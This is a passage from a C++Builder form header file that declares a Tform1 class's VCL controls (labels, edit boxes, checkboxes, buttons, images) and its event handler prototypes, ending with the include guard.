TLabel *Label10;
TLabel *Label11;
TEdit *Edit7;
TEdit *Edit11;
TLabel *Label15;
TLabel *Label16;
TCheckBox *CheckBox3;
TEdit *Edit8;
TLabel *Label12;
TEdit *Edit9;
TLabel *Label13;
TEdit *Edit10;
TLabel *Label14;
TEdit *Edit13;
TCheckBox *CheckBox4;
TGroupBox *GroupBox2;
TLabel *Label7;
TCheckBox *CheckBox5;
TCheckBox *CheckBox6;
TBitBtn *BitBtn1;
TBitBtn *BitBtn2;
TBitBtn *BitBtn3;
TBitBtn *BitBtn4;
TTabSheet *TabSheet0;
TLabel *Label4;
TGroupBox *GroupBox3;
TCheckBox *CheckBox7;
TCheckBox *CheckBox8;
TCheckBox *CheckBox9;
TCheckBox *CheckBox10;
TCheckBox *CheckBox11;
TEdit *Edit5;
TGroupBox *GroupBox4;
TLabel *Label9;
TCheckBox *CheckBox12;
TButton *Button1;
TBitBtn *BitBtn5;
TCheckBox *CheckBox13;
TGroupBox *GroupBox5;
TCheckBox *CheckBox14;
TCheckBox *CheckBox15;
TCheckBox *CheckBox16;
TImage *Image1;
TLabel *Label17;
TImage *Image2;

void __fastcall Label1Click(TObject *Sender);
void __fastcall CheckBox3Click(TObject *Sender);
void __fastcall CheckBox4Click(TObject *Sender);
void __fastcall Edit4KeyPress(TObject *Sender, char &Key);
void __fastcall Edit8KeyPress(TObject *Sender, char &Key);
void __fastcall Edit9KeyPress(TObject *Sender, char &Key);
void __fastcall Edit10KeyPress(TObject *Sender, char &Key);
void __fastcall Edit5KeyPress(TObject *Sender, char &Key);
void __fastcall Edit4Exit(TObject *Sender);
void __fastcall Edit8Exit(TObject *Sender);
void __fastcall Edit9Exit(TObject *Sender);
void __fastcall Edit10Exit(TObject *Sender);
void __fastcall BitBtn1Click(TObject *Sender);
void __fastcall Label4Click(TObject *Sender);
void __fastcall BitBtn2Click(TObject *Sender);
void __fastcall BitBtn3Click(TObject *Sender);
void __fastcall BitBtn4Click(TObject *Sender);
void __fastcall formClose(TObject *Sender, TCloseAction &Action);
void __fastcall formActivate(TObject *Sender);
void __fastcall BitBtn5Click(TObject *Sender);
void __fastcall Button1Click(TObject *Sender);
void __fastcall TabSheet0ContextPopup(TObject *Sender,
TPoint &MousePos, bool &Handled);

private: // User declarations
public: // User declarations
__fastcall Tform1(TComponent* Owner);

int i;
AnsiString B;

};
//---------------------------------------------------------------------------
extern PACKAGE Tform1 *form1;
//---------------------------------------------------------------------------
#endif